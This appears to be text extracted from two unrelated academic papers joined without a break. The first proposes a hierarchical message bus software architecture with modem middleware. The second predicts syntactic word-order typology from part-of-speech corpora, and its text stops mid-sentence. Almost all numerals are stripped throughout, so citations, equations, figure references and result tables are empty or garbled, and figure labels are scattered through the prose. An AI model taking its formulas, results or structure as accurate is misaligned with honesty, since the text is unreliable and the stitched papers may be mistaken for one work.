e-mail: @qq.com abstract—the traditional architecture based on the hierarchical message bus has defects such as strict component requirements and lack of support for reuse. the article introduces message-message modem and interface-message modem construction middleware to propose a new hierarchical message bus. the structure new hierarchical message bus solves the problem that the hierarchical message bus architecture requires too strict system components, and the components that fail to provide corresponding interfaces lack support for reuse. firstly, the paper introduces the traditional hierarchical message bus architecture and its existing defects. secondly, the article proposes new hierarchical message bus. based on the hierarchical message bus architecture. finally, the article summarizes the architecture new hierarchical message bus proposed in this paper. keywords-hierarchical message bus; middleware; modem; new hierarchical message bus i. introduction one of the core questions of software architecture design is whether it is possible to use repetitive architecture patterns, that is, whether it can achieve software reuse of the architecture [ ]. the structure of the traditional architecture is mostly based on the c/s or hierarchical mode. although the c/s and hierarchical modes are easy to understand and have high efficiency, they are highly targeted and expand some large systems in specific fields. and the reuse of components is not very friendly. in reality, there is often a need for an architecture with both a stable static structure and sufficient component reuse. based on the traditional hierarchical message bus structure, this paper further expands and improves the hierarchical message bus for different types of components, and develops intermediate components with wider application scope and better reusability to maximize software reuse. the effect is to achieve greater efficiency of component reuse. international journal of advanced network, monitoring and controls volume , no. , ii. key technology based on the traditional hierarchical message bus structure (hmb), this paper constructs two convenient middleware message-message modem (mmm) and interface-message modem (imm) for conversion and adjustment of different standard types of components, so as to achieve greater efficiency of component reuse. this article developed two general middleware: ) message-message modem (mmm), a non-standard component based on the message interconnect interface, uses mmm middleware to send and receive and parse messages between the component and the message bus. ) interface-message modem (imm), calling non-standard components of the interface, using imm middleware to complete the conversion and transmission between the interface and the message. iii. architecture design a. traditional hierarchical message bus architecture the hierarchy message bus (hmb) architecture is a software architecture proposed by yang fuqing et al.[ ]. this architecture is based on a hierarchical message bus and supports the distribution and concurrency of components. all components pass through the message bus communicate as shown in figure . composite component message bus (middleware) component standard component component component component hierarchical message bus (connector) component component component �� figure . hierarchical message bus architecture diagram the connection of the system is the message bus, which is responsible for the dispatch, delivery, filtering and return of the processing results of the message [ ]. the components in the system are all connected to the message bus and register the type of messages that interest them to the message bus. the component sends out the corresponding message according to the needs of the system, and the message bus is responsible for dispatching the message to all components interested in the message in the system. in the hmb architecture, the message is the only way for all components in the system to communicate. when the component receives the message from the message bus, it responds to the message according to its own state, and then returns the corresponding processing result to the target component through the message bus [ ]. since all the components in the system are connected through the message bus, it is not required that each component has the same address space or be limited to one machine, so this style can better describe the distributed concurrent system. the system and the components that make up the system are usually more complicated, and it is difficult to obtain a complete understanding of them from one perspective, so a good software engineering method often models the system from multiple perspectives, generally including the static structure and dynamic behavior of the system and functions [ ]. international journal of advanced network, monitoring and controls volume , no. , ) component model: the component model of hmb includes three parts: component interface, static structure and dynamic behavior, as shown in figure [ ] . action interface structure internal message external message hierarchical message bus (connector) component component component figure . component model of hmb architecture the interface part of the component represents the set of interfaces supported by the component. common ones are internal standard message interface, external message standard interface and external interface, and each interface defines a set of input and output messages. the behavior part of the component is represented by the finite state automaton with output. when the component receives the message, the finite state automaton responds to the received message according to the current state, resulting in a state transition. the structural part of the component represents the internal structure of the composite component. the composite component is composed of an atomic component and a local message bus. several local components can be connected to the local message bus. the local message bus is a simple representation of the message bus. the role of the message bus it shows that it provides a unified integration mechanism for the entire system and components at all levels. ) component interface: generally speaking, the component interface represents the interaction path between the component and the external environment. in the hmb architecture, the component interface is a message-based interconnection interface, where the interface represents the set of messages sent and received by the component, and the components communicate with each other through messages, which together constitute the component interface. in the general system defined by the interconnection interface, the connection between components is usually a fixed match between the requester of the service and the service provider, while in the system defined by the hmb architecture, the component has external messages after the response, it will cause a change of state. therefore, it can be found that, after receiving the same message, a component may have different responses at different times and in different states. ) message bus: the message bus is the connection of the system. in the system, all components form a component-message response registration form by registering the types of messages of interest to the message bus. the message bus locates the corresponding message based on the type of message it receives and the information in the component-message response registration table, passes the message to the corresponding responder, and is responsible for returning the processing result. when necessary, the message bus also needs to filter and block specific messages, as shown in figure . component_ component_ transfer message message bus attribute: component instance table component response table message filtering table services: message registration message dispatch message transfer message filtering figure . message bus structure diagram international journal of advanced network, monitoring and controls volume , no. , message registration: the component registers the response message set with the message bus. message dispatching and delivery: messages are passed between components through the message bus. the message bus dispatches messages to components interested in the message according to the component-message response registration form, and returns the processing results [ ]. message filtering: the message bus implements message filtering between components through message conversion or message blocking, to avoid message conflicts and message mismatch problems during component integration. through the above analysis, it can be found that the hmb architecture improves the degree of cohesion between the various components, while reducing the degree of coupling between the components, but there are still certain defects: first, if there is an existing well-functioning component, but due to the different form of the interface, it will not be used in this system, and it is necessary to re-develop the same functional component that fully complies with the interface standard, which is in line with the architectural style to improve software reuse development efficiency is contradictory. second, although the message filtering mechanism of the message bus has a certain message matching function, it can only process components that interact through messages, but not components that interact through interface calls, and it may be necessary to match different messages. modifying the design of the message bus has caused some instability to the system. third, the architectural style of hmb has too strict requirements on the components that make up the system. only strictly qualified components can be used, and there is a lack of reuse support for components that fail to provide corresponding interfaces. therefore, it is necessary to improve and expand the architecture based on the hierarchical message bus. b. new hierarchical message bus architecture composite component message bus (middleware) imm standard component mmm component component hierarchical message bus (connector) component component component �� immc immc figure . schematic diagram of the nhmb architecture this paper improves the traditional hmb architecture and becomes a new hmb architecture style (nhmb, new hierarchical message bus), as shown in figure below. compared with the traditional hmb architecture, the nhmb architecture adds non-standard components of interface-message modem and message-message modem and message interface. among them, the message-message modem (mmm), a non-standard international journal of advanced network, monitoring and controls volume , no. , component based on the message interconnection interface, uses mmm middleware to send and receive and parse messages between the component and the message bus. the interface-message modem (imm) calls the non-standard components of the interface and uses imm middleware to complete the conversion and transmission between the interface and the message. complex components in the system can be decomposed into relatively low-level subcomponents, which are connected through a local message bus [ ]. such complex components are called composite components. if the sub-components are still relatively complex, they can be further decomposed, and the decomposition continues in this way, and the entire system forms a tree-like topology. the end nodes of the tree structure are called leaf nodes. they are atomic components in the system and no longer contain subcomponents. the entire system can be used as a component to integrate into a larger system through a higher-level message bus. therefore, the entire system and the individual components that make up the system can be characterized in a unified manner. the improved nhmb architecture model in this paper is similar to the hmb structure, which has three parts: interface, static structure and dynamic behavior. interface: the interface in nhmb can be either the originally supported interface with message interaction function or an interface that only provides formal calls. static structure: the composite components in nhmb are also based on nhmb's architectural style, not the original hmb's architectural style. based on the above two changes, the architecture can greatly reduce the requirements for the specificity of components, so that existing components can be reused to a greater extent. ) component model: the improved nhmb architecture in this paper is similar to the hmb architecture, which has three parts: interface, static structure and dynamic behavior. action interface structure internal message external message hierarchical message bus (connector) modem component component non-standard message non-standard component figure . component model of nhmb architecture ) component interface: the nhmb architecture achieves the indirect use of such components by adding an interface-message modem or a message-message modem between the type of component and the message bus. from the overall system perspective, although a module is added to the system, it has no effect on other modules of the system. in addition, there is no need to modify the message bus. in a sense, the nhmb architecture can achieve the effect of supporting more types of components by adding corresponding middleware modules, thereby greatly improving the system development efficiency and system stability. ) modem middleware: in order to support non-standard components, this article adds interface-message modem or message-message modem middleware to complete the reception and analysis of messages in the system in the nhmb architecture. so as to better adapt to the development of software systems, and greatly reduce the complexity of software system development, maintaining the stability of the system. the working principle of the modem is shown in figure below. international journal of advanced network, monitoring and controls volume , no. , message bus (connector) component_a component_b component_interface message-message modem interface-message modem ms g_a ms g_b msg_a ms g_b ms g_a ms g_a msg_b ms g_b ms g_i ms g_i ms g_i ms g_i figure . message modem middleware component a, component b, and interface component send messages to the message bus together. component a and component b are standard components. component interface is an interface component. two different types of components first send their own characteristic messages msg_a , msg_b , msg_i to mmm and immm, then mmm and immm parse the message msg_a , msg_b , msg_i from the component according to the rules prescribed in advance with the standard component and interface component, and then repackage the message into msg_a according to the format that the message bus can handle. msg_b , msg_i , and forwarded to the corresponding message bus, so as to achieve indirect communication between component a, component b and interface component interface to the message bus, the process of returning messages is similar to the process of sending messages. ) structural characteristics of nhmb system: high robustness: the message-message modem/interface modem added in this paper has a strong resolution and modulation mechanism, and has strong fault handling and recovery capabilities for non-standard components based on the message interconnect interface. higher development efficiency: the system can use mature functional components, even if its interface does not meet the needs of the system, it can be easily integrated into the system by adding a simple modem. support the distributed operation of each functional module: since all components in the system interact through the message bus, the system can pass the messages of each module to each other without affecting the distributed concurrent operation. more secure: the nhmb architecture designed in this paper introduces a modem. in order to increase the security of the system and prevent the communication of the message bus from being maliciously destroyed, authentication and encryption are adopted in the nhmb architecture style to ensure the security of message transmission. the introduction of modem not only reduces the requirements for components, increases the range of component selection, improves the scalability of the system, but also provides a convenient way for the system to expand the security mechanism, that is, the modem developed at this time not only contains message interface matching it also provides special functions for encryption and decryption. easy to expand and maintain: each component in the system is independent of each other, so when expanding or modifying system functions, you can only operate the specific modules in it, without affecting other modules. iv. conclusion the nhmb architecture proposed in this paper has the advantages of high robustness, higher system development efficiency, easy expansion and easy maintenance. by adding two intermediate components of message-message modem and interface-message modem on the basis of the traditional hmb architecture the operation greatly reduces the complexity of software system development, maintains the stability of the system, and solves the problem that components with good functions cannot be used because of different interfaces, and the same functional components and hmb system that meet the interface standards need to be redeveloped the structure has too strict requirements on the components constituting the international journal of advanced network, monitoring and controls volume , no. , system, and lacks reuse support for components that fail to provide corresponding interfaces. references [ ] zhang yousheng. the third article of software architecture series-style of software architecture [j]. programmer, ( ): - . [ ] zhang shikun, wang lifu, chang xin, yang fuqing. software architecture description language based on hierarchical message bus [j]. chinese journal of electronics, ( ): - . [ ] zhang shikun, wang lifu, yang fuqing. software architecture style based on hierarchical message bus [j]. chinese science series e: technology science, ( ): - . [ ] zhang yousheng, software architecture [m]. version . beijing: tsinghua university press, . [ ] zhang shikun, wang lifu, chang xin, yang fuqing. software architecture description language based on hierarchical message bus [j]. acta electronica sinica, ( ): - . [ ] yang fuqing, mei hong, li keqin.software reuse and software component technology [j]. journal of electronics, ( ): - + . [ ] qin guorong, zhang shikun. research on dynamic simulation and evolution of software architecture based on hierarchical message bus [j]. computer science, ( ): - . [ ] wang you, rong mei, zhang guangquan. application system model based on hierarchical message [j]. computer science, ( ): - + . fine-grained prediction of syntactic typology: discovering latent structure with supervised learning dingquan wang and jason eisner department of computer science, johns hopkins university {wdd,eisner}@jhu.edu abstract we show how to predict the basic word-order facts of a novel language given only a cor- pus of part-of-speech (pos) sequences. we predict how often direct objects follow their verbs, how often adjectives follow their nouns, and in general the directionalities of all depen- dency relations. such typological properties could be helpful in grammar induction. while such a problem is usually regarded as unsu- pervised learning, our innovation is to treat it as supervised learning, using a large collec- tion of realistic synthetic languages as train- ing data. the supervised learner must identify surface features of a language’s pos sequence (hand-engineered or neural features) that cor- relate with the language’s deeper structure (la- tent trees). in the experiment, we show: ) given a small set of real languages, it helps to add many synthetic languages to the training data. ) our system is robust even when the pos sequences include noise. ) our system on this task outperforms a grammar induction baseline by a large margin. introduction descriptive linguists often characterize a human language by its typological properties. for instance, english is an svo-type language because its basic clause order is subject-verb-object (svo), and also a prepositional-type language because its adpositions normally precede the noun. identifying basic word order must happen early in the acqui- sition of syntax, and presumably guides the initial interpretation of sentences and the acquisition of a finer-grained grammar. in this paper, we propose a method for doing this. while we focus on word order, one could try similar methods for other typo- logical classifications (syntactic, morphological, or phonological). the problem is challenging because the lan- guage’s true word order statistics are computed from syntax trees, whereas our method has access only to a pos-tagged corpus. based on these pos se- quences alone, we predict the directionality of each type of dependency relation. we define the direc- tionality to be a real number in [ , ]: the fraction of tokens of this relation that are “right-directed,” in the sense that the child (modifier) falls to the right of its parent (head). for example, the dobj relation points from a verb to its direct object (if any), so a di- rectionality of . —meaning that % of dobj de- pendencies are right-directed—indicates a dominant verb-object order. (see table for more such exam- ples.) our system is trained to predict the relative frequency of rightward dependencies for each of dependency types from the universal dependencies project (ud). we assume that all languages draw on the same set of pos tags and dependency relations that is proposed by the ud project (see § ), so that our predictor works across languages. why do this? liu ( ) has argued for using these directionality numbers in [ , ] as fine-grained and robust typological descriptors. we believe that these directionalities could also be used to help de- fine an initializer, prior, or regularizer for tasks like grammar induction or syntax-based machine trans- lation. finally, the vector of directionalities—or the feature vector that our method extracts in or- der to predict the directionalities—can be regarded as a language embedding computed from the pos- tagged corpus. this language embedding may be useful as an input to multilingual nlp systems, such as the cross-linguistic neural dependency parser of ammar et al. ( ). in fact, some multilingual nlp systems already condition on typological properties looked up in the world atlas of language struc- tures, or wals (dryer and haspelmath, ), as transactions of the association for computational linguistics, vol. , pp. – , . action editor: mark steedman. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. typology example verb-object (english) she gave me a raise dobj object-verb (hindi) she me a raise gave vah mujhe ek uthaane diya dobj prepositional (english) she is in a car case postpositional (hindi) she a car in is vah ek kaar mein hai case adjective-noun (english) this is a red car amod noun-adjective (french) this is a car red ceci est une voiture rouge amod table : three typological properties in the world atlas of lan- guage structures (dryer and haspelmath, ), and how they affect the directionality of universal dependencies relations. we review in § . however, wals does not list all properties of all languages, and may be somewhat inconsistent since it collects work by many linguists. our system provides an automatic alternative as well as a methodology for generalizing to new properties. more broadly, we are motivated by the chal- lenge of determining the structure of a language from its superficial features. principles & parame- ters theory (chomsky, ; chomsky and lasnik, ) famously—if controversially—hypothesized that human babies are born with an evolutionarily tuned system that is specifically adapted to natural language, which can predict typological properties (“parameters”) by spotting telltale configurations in purely linguistic input. here we investigate whether such a system can be tuned by gradient descent. it is at least plausible that useful superficial features do exist: e.g., if nouns often precede verbs but rarely follow verbs, then the language may be verb-final. approach we depart from the traditional approach to latent structure discovery, namely unsupervised learning. unsupervised syntax learners in nlp tend to be rather inaccurate—partly because they are failing to maximize an objective that has many local optima, and partly because that objective does not capture all the factors that linguists consider when assigning syntactic structure. our remedy in this paper is a su- pervised approach. we simply imitate how linguists have analyzed other languages. this supervised ob- jective goes beyond the log-likelihood of a pcfg- like model given the corpus, because linguists do not merely try to predict the surface corpus. their de- pendency annotations may reflect a cross-linguistic theory that considers semantic interpretability and equivalence, rare but informative phenomena, con- sistency across languages, a prior across languages, and linguistic conventions (including the choice of latent labels such as dobj). our learner does not consider these factors explicitly, but we hope it will identify correlates (e.g., using deep learning) that can make similar predictions. being supervised, our objective should also suffer less from local optima. indeed, we could even set up our problem with a convex objective, such as (kernel) logistic regres- sion, to predict each directionality separately. why hasn’t this been done before? our set- ting presents unusually sparse data for supervised learning, since each training example is an en- tire language. the world presumably does not offer enough natural languages—particularly with machine-readable corpora—to train a good classi- fier to detect, say, object-verb-subject (ovs) lan- guages, especially given the class imbalance prob- lem that ovs languages are empirically rare, and the non-iid problem that the available ovs lan- guages may be evolutionarily related. we miti- gate this issue by training on the galactic depen- dencies treebanks (wang and eisner, ), a col- lection of more than , human-like synthetic languages. the treebank of each synthetic language is generated by stochastically permuting the sub- trees in a given real treebank to match the word or- der of other real languages. thus, we have many synthetic languages that are object-verb like hindi but also noun-adjective like french. we know the true directionality of each synthetic language and we would like our classifier to predict that directional- ity, just as it would for a real language. we will show that our system’s accuracy benefits from fleshing out the training set in this way, which can be seen as a form of regularization. properties shared within an ovs language family may ap- pear to be consistently predictive of ovs, but are actually con- founds that will not generalize to other families in test data. a possible criticism of our work is that obtaining the input pos sequences requires human annotators, and perhaps these annotators could have answered the typological classification questions as well. in- deed, this criticism also applies to most work on grammar induction. we will show that our system is at least robust to noise in the input pos sequences (§ . ). in the future, we hope to devise similar meth- ods that operate on raw word sequences. data we use two datasets in our experiment: ud: universal dependencies version . (et al., ) a collection of dependency treebanks for languages, annotated in a consistent style with pos tags and dependency relations. gd: galactic dependencies version . (wang and eisner, ) a collection of projective de- pendency treebanks for , synthetic languages, using the same format as ud. the treebank of each synthetic language is generated from the ud treebank of some real language by stochastically permuting the dependents of all nouns and/or verbs to match the dependent orders of other real ud lan- guages. using this “mix-and-match” procedure, the gd collection fills in gaps in the ud collection— which covers only a few possible human languages. task formulation we now formalize the setup of the fine-grained typo- logical prediction task. let r be the set of universal relation types, with n = |r|. we use r→ to denote a rightward dependency token with label r ∈r. input for language l: a pos-tagged corpus u. (“u” stands for “unparsed.”) output for language l: our system predicts p(→| r,l), the probability that a token in language l of an r-labeled dependency will be right-oriented. it predicts this for each dependency relation type r ∈ r, such as r = dobj. thus, the output is a vector of predicted probabilities p̂ ∈ [ , ]n . training: we set the parameters of our system using a collection of training pairs (u,p∗), each of which corresponds to some ud or gd training lan- guage l. here p∗ denotes the true vector of proba- bilities as empirically estimated from l’s treebank. evaluation: over pairs (u,p∗) that correspond to held-out real languages, we evaluate the expected loss of the predictions p̂. we use ε-insensitive loss with ε = . , so our evaluation metric is ∑ r∈r p∗(r | l) · lossε(p̂(→| r,l),p∗(→| r,l)) ( ) where • lossε(p̂,p∗) ≡ max(|p̂−p∗|−ε, ) • p∗(→| r,l) = countl( r→) countl(r) is the empirical esti- mate of p(→| r,l). • p̂(→| r,l) is the system’s prediction of p∗ the aggregate metric ( ) is an expected loss that is weighted by p∗(r | l) = countl(r)∑ r′∈r countl(r ′) , to empha- size relation types that are more frequent in l. why this loss function? we chose an l -style loss, rather than l loss or log-loss, so that the ag- gregate metric is not dominated by outliers. we took ε > in order to forgive small errors: if some pre- dicted directionality is already “in the ballpark,” we prefer to focus on getting other predictions right, rather than fine-tuning this one. our intuition is that errors < ε in p̂’s elements will not greatly harm downstream tasks that analyze individual sentences, and might even be easy to correct by grammar rees- timation (e.g., em) that uses p̂ as a starting point. in short, we have the intuition that if our pre- dicted p̂ achieves small lossε on the frequent relation types, then p̂ will be helpful for downstream tasks, although testing that intuition is beyond the scope of this paper. one could tune ε on a downstream task. simple “expected count” baseline before launching into our full models, we warm up with a simple baseline heuristic called expected count (ec), which is reminiscent of principles & pa- rameters. the idea is that if adjs tend to precede nearby nouns in the sentences of language l, then amod probably tends to point leftward in l. after all, the training languages show that when adj and noun are nearby, they are usually linked by amod. fleshing this out, ec estimates directionalities as p̂(→| r,l) = ecountl( r→) ecountl( r→) + ecountl( r←) ( ) proposed by v. vapnik for support vector regression. where we estimate the expected r← and r→ counts by ecountl( r→) = ∑ u∈u ∑ ≤i<j≤|u| j−i<w p( r→| ui,uj) ( ) ecountl( r←) = ∑ u∈u ∑ ≤i<j≤|u| j−i<w p( r←| ui,uj) ( ) here u ranges over tag sequences (sentences) of u, and w is a window size that characterizes “nearby.” in other words, we ask: given that ui and uj are nearby tag tokens in the test corpus u, are they likely to be linked? formulas ( )–( ) count such a pair as a “soft vote” for r→ if such pairs tended to be linked by r→ in the treebanks of the training languages, and a “soft vote” for r← if they tended to be linked by r←. training: for any two tag types t,t′ in the univer- sal pos tagset t , we simply use the training tree- banks to get empirical estimates of p(· | t,t′), taking p( r→| t,t′) = ∑ l sl · countl(t r→ t′)∑ l sl · countl(t,t′) ( ) and similarly for p( r←| t,t′). this can be interpreted as the (unsmoothed) fraction of (t,t′) within a w- word window where t is the r-type parent of t′, com- puted by micro-averaging over languages. to get a fair average over languages, equation ( ) down- weights the languages that have larger treebanks, yielding a weighted micro-average in which we de- fine the weight sl = / ∑ t∈t ,t′∈t countl(t,t ′). as we report later in table , even this simple su- pervised heuristic performs significantly better than state-of-the-art grammar induction systems. how- ever, it is not a trained heuristic: it has no free pa- rameters that we can tune to optimize our evaluation metric. for example, it can pay too much attention to tag pairs that are not discriminative. we therefore proceed to build a trainable, feature-based system. proposed model architecture to train our model, we will try to minimize the eval- uation objective ( ) averaged over the training lan- in our experiment, we chose w = by cross-validation over w = , , , ,∞. thus, the ec heuristic examines the correlation between relations and tags in the training treebanks. but our methods in the next section will follow the formalization of § : they do not examine a training treebank beyond its directionality vector p∗. logistic figure : basic predictive architecture from equations ( )–( ). bw and bv are suppressed for readability. guages, plus a regularization term given in § . . . directionality predictions from scores our predicted directionality for relation r will be p̂(→| r,l) = /( + exp(−s(u)r)) ( ) s(u) is a parametric function (see § . below) that maps u to a score vector in rn . relation type r should get positive or negative score according to whether it usually points right or left. the for- mula above converts each score to a directionality— a probability in ( , )—using a logistic transform. . design of the scoring function s(u) to score all dependency relation types given the cor- pus u, we use a feed-forward neural network with one hidden layer (figure ): s(u) = v ψ(wπ(u) + bw ) + bv ( ) π(u) extracts a d-dimensional feature vector from the corpus u (see § . below). w is a h × d ma- trix that maps π(u) into a h-dimensional space and bw is a h-dimensional bias vector. ψ is an element- wise activation function. v is a n×h matrix whose rows can be regarded as learned embeddings of the dependency relation types. bv is a n-dimensional bias vector that determines the default rightwardness of each relation type. we give details in § . . the hidden layer ψ(wπ(u) + bw ) can be re- garded as a latent representation of the language’s word order properties, from which potentially cor- related predictions p̂ are extracted. we gave all training languages the same weight. in prin- ciple, we could have downweighted the synthetic languages as out-of-domain, using cross-validation to tune the weighting. . design of the featurization function π(u) our current feature vector π(u) considers only the pos tag sequences for the sentences in the unparsed corpus u. each sentence is augmented with a special boundary tag # at the start and end. we explore both hand-engineered features and neural features. hand-engineered features. recall that § consid- ered which tags appeared near one another in a given order. we now devise a slew of features to measure such co-occurrences in a variety of ways. by train- ing the weights of these many features, our system will discover which ones are actually predictive. let g(t | j) ∈ [ , ] be some measure (to be de- fined shortly) of the prevalence of tag t near token j of corpus u. we can then measure the prevalence of t, both overall and just near tokens of tag s: πt = mean j g(t | j) ( ) πt|s = mean j: tj =s g(t | j) ( ) where tj denotes the tag of token j. we now define versions of these quantities for particular prevalence measures g. given w > , let the right window wj denote the sequence of tags tj+ , . . . ,tj+w (padding this se- quence with additional # symbols if it runs past the end of j’s sentence). we define quantities πw t|s and πwt via ( )–( ), using a version of g(t | j) that mea- sures the fraction of tags in wj that equal t. also, for b ∈ { , }, we define πw,b t|s and π w,b t using a ver- sion of g(t | j) that is if wj contains at least b tokens of t, and otherwise. for each of these quantities, we also define a corresponding mirror-image quantity (denoted by negating w > ) by computing the same feature on a reversed version of the corpus. we also define “truncated” versions of all quan- tities above, denoted by writing ˆ over the w. in these, we use a truncated window ŵj, obtained from wj by removing any suffix that starts with # in practice, we do backoff smoothing of these means. this avoids subsequent division-by- errors if tag t or s has count in the corpus, and it regularizes πt|s/πt toward if t or s is rare. specifically, we augment the denominators by adding λ, while augmenting the numerator in ( ) by adding λ ·meanj,t g(t | j) (unsmoothed) and the numerator in ( ) by adding λ times the smoothed πt from ( ). λ > is a hyperparameter (see § . ). . . . . . . f . . . . . . . . . . . . . . . f . . . soft-pooling . . . figure : extracting and pooling the neural features. or with a copy of tag tj (that is, s). as an example, π ̂, n|v asks how often a verb is followed by at least nouns, within the next words of the sentence and before the next verb. a high value of this is a plausi- ble indicator of a vso-type or vos-type language. we include the following features for each tag pair s,t and each w ∈ { , , , , − ,− ,− ,− , ̂, ̂, ̂, ˆ ,− ̂,− ̂,− ̂,− ˆ }: πwt , π w t|s, π w t|s ·π w s , π w t|s//π w t , π w t //π w t|s, π w t|s//π −w t|s where we define x//y = min(x/y, ) to prevent unbounded feature values, which can result in poor generalization. notice that for w = , πw t|s is bigram conditional probability, πw t|s·π w s is bigram joint prob- ability, the log of πw t|s/π w t is bigram pointwise mu- tual information, and πw t|s/π −w t|s measures how much more prevalent t is to the right of s than to the left. by also allowing other values of w, we generalize these features. finally, our model also uses versions of these features for each b ∈ , . neural features. as an alternative to the manu- ally designed π function above, we consider a neural approach to detect predictive configurations in the sentences of u, potentially including complex long- distance configurations. linguists working with principles & parameters theory have supposed that a single telltale sentence—a trigger—may be enough in the “fraction of tags” features, g(t | j) is undefined ( ) when ŵj is empty. we omit undefined values from the means. the reason we don’t include π−w t|s //π w t|s is that it is in- cluded when computing features for −w. to determine a typological parameter, at least given the settings of other parameters (gibson and wexler, ; frank and kapur, ). we map each corpus sentence ui to a finite- dimensional real vector fi by using a gated recur- rent unit (gru) network (cho et al., ), a type of recurrent neural network that is a simplified variant of an lstm network (hochreiter and schmidhuber, ). the gru reads the sequence of one-hot em- beddings of the tags in ui (including the boundary symbols #). we omit the part of the gru that com- putes an output sequence, simply taking fi to be the final hidden state vector. the parameters are trained jointly with the rest of our typology prediction sys- tem, so the training procedure attempts to discover predictively useful configurations. the various elements of fi attempt to detect vari- ous interesting configurations in sentence ui. some might be triggers (which call for max-pooling over sentences); others might provide softer evidence (which calls for mean-pooling). for generality, therefore, we define our feature vector π(u) by soft- pooling of the sentence vectors fi (figure ). the tanh gate in the gru implies fik ∈ (− , ) and we transform this to the positive quantity f ′ik = fik+ ∈ ( , ). given an “inverse temperature” β, define π β k = ( mean i (f ′ik) β ) /β ( ) this πβk is a pooled version of f ′ ik, ranging from max-pooling as β →−∞ (i.e., does f ′ik fire strongly on any sentence i?) to min-pooling as β → −∞. it passes through arithmetic mean at β = (i.e., how strongly does f ′ik fire on the average sentence i?), ge- ometric mean as β → (this may be regarded as an arithmetic mean in log space), and harmonic mean at β = − (an arithmetic mean in reciprocal space). our final π is a concatenation of the πβ vectors for β ∈ {− ,− ,− , , , , }. we chose these β values experimentally, using cross-validation. combined model. we also consider a model s(u) = αsh(u) + ( −α) sn(u) ( ) where sh(u) is the score assigned by the hand- feature system, sn(u) is the score assigned by the for efficiency, we restrict the mean to i ≤ e (the first , sentences). neural-feature system, and α ∈ [ , ] is a hyperpa- rameter to balance the two. sh(u) and sn(u) were trained separately. at test time, we use ( ) to com- bine them linearly before the logistic transform ( ). this yields a weighted-product-of-experts model. . training procedure length thresholding. by default, our feature vec- tor π(u) is extracted from those sentences in u with length ≤ tokens. in § . , however, we try con- catenating this feature vector with one that is ex- tracted in the same way from just sentences with length ≤ . the intuition (spitkovsky et al., ) is that the basic word order of the language can be most easily discerned from short, simple sentences. initialization. we initialize the model of ( )–( ) so that the estimated directionality p̂(→| r,l), re- gardless of l, is initially a weighted mean of r’s di- rectionalities in the training languages, namely p̄r ≡ ∑ l wl(r) p ∗(→| r,l) ( ) where wl(r) ≡ p ∗(r|l)∑ l′ p ∗(r|l′) ( ) this is done by setting v = and the bias (bv )r = log p̄r −p̄r , clipped to the range [− , ]. as a result, we make sensible initial predictions even for rare re- lations r, which allows us to converge reasonably quickly even though we do not update the parame- ters for rare relations as often. we initialize the recurrent connections in the gru to random orthogonal matrices. all other weight matrices in figure and the gru use “xavier initialization” (glorot and bengio, ). all other bias weight vectors are initialized to . regularization. we add an l regularizer to the objective. when training the neural network, we use dropout as well. all hyperparameters (regularization coefficient, dropout rate, etc.) are tuned via cross- validation; see § . . optimization. we use different algorithms in dif- ferent feature settings. with scoring functions that use only hand features, we adjust the feature weights by stochastic gradient descent (sgd). with scor- ing functions that include neural features, we use rmsprop (tieleman and hinton, ). train test cs, es, fr, hi, de, it, la itt, no, ar, pt en, nl, da, fi, got, grc, et, la proiel, grc proiel, bg la, hr, ga, he, hu, fa, ta, cu, el, ro, sl, ja ktc, sv, fi ftb, id, eu, pl table : data split of the real languages, adapted from wang and eisner ( ). (our “train,” on which we do -fold cross- validation, contains both their “train” and “dev” languages.) experiments . data splits we hold out ud languages for testing (table ). for training, we use the remaining ud languages and tune the hyperparameters with -fold cross- validation. that is, for each fold, we train the system on real languages and evaluate on the remaining . when augmenting the real languages with gd languages, we include only gd languages that are generated by “mixing-and-matching” those lan- guages, which means that we add × × = synthetic languages. each gd treebank u provides a standard split into train/dev/test portions. in this paper, we primarily restrict ourselves to the train portions (saving the gold trees from the dev and test portions to tune and evaluate some future grammar induction system that consults our typological predictions). for example, we write utrain for the pos-tagged sentences in the “train” portion, and p∗train for the empirical probabil- ities derived from their gold trees. we always train the model to predict p∗train from utrain on each train- ing language. to evaluate on a held-out language during cross-validation, we can measure how well the model predicts p∗train given utrain. for our fi- why × × ? as wang and eisner ( , § ) explain, each gd treebank is obtained from the ud treebank of some substrate language s by stochastically permuting the depen- dents of verbs and nouns to respect typical orders in the super- strate languages rv and rn respectively. there are choices for s. there are choices for rv (respectively rn), including rv = s (“self-permutation”) and rv = ∅ (“no permutation”). in actuality, we measured how well it predicts p∗dev given udev. that was a slightly less sensible choice. it may have harmed our choice of hyperparameters, since dev is smaller than train and therefore p∗dev tends to have greater sampling er- ror. another concern is that our typology system, having been specifically tuned to predict p∗dev, might provide an unrealisti- cally accurate estimate of p∗dev to some future grammar induc- tion system that is being cross-validated against the same dev set, harming that system’s choice of hyperparameters as well. architecture ε-insensitive loss scoring depth ud +gd ec - . . sh . . * sh . . * sh . . sn . . αsh + ( −α) sn . . * table : average expected loss over ud languages, com- puted by -fold cross-validation. the first column indicates whether we score using hand-engineered features (sh), neural features (sn), or a combination (see end of § . ). as a baseline, the first line evaluates the ec (expected count) heuristic from § . within each column, we boldface the best (smallest) re- sult as well as all results that are not significantly worse (paired permutation test by language, p < . ). a starred result is significantly better than the other model in the same row. nal test, we evaluate on the test languages using a model trained on all training languages ( tree- banks for ud, plus × × = when adding gd) with the chosen hyperparameters. to evaluate on a test language, we again measure how well the model predicts p∗train from utrain. . comparison of architectures table shows the cross-validation losses (equa- tion ( )) that are achieved by different scoring ar- chitectures. we compare the results when the model is trained on real languages (the “ud” column) ver- sus on real languages plus synthetic languages (the “+gd” column). the sh models here use a subset of the hand- engineered features, selected by the experiments in § . below and corresponding to table line . although figure and equation ( ) presented an “depth- ” scoring network with one hidden layer, table also evaluates “depth-d” architectures with d hidden layers. the depth- architecture simply pre- dicts each directionality separately using logistic re- gression (although our training objective is not the usual convex log-likelihood objective). some architectures are better than others. we note that the hand-engineered features outperform the neural features—though not significantly, since they make complementary errors—and that com- bining them is best. however, the biggest benefit comes from augmenting the training data with gd languages; this consistently helps more than chang- ing the architecture. id features length loss (+gd) ∅ — . conditional . joint . pmi . asymmetry . rows + . row +b . row +t . * row +b+t . row . row + . table : cross-validation losses with different subsets of hand- engineered features from § . . “∅” is a baseline with no fea- tures (bias feature only), so it makes the same prediction for all languages. “conditional” = πwt|s features, “joint” = π w t|s ·πws fea- tures, “pmi” = πwt|s//π w t and π w t //π w t|s features, “asymmetry” = πwt|s//π −w t|s features, “b” are the features superscripted by b, and “t” are the features with truncated window. “+” means con- catenation.the “length” field refers to length thresholding (see § . 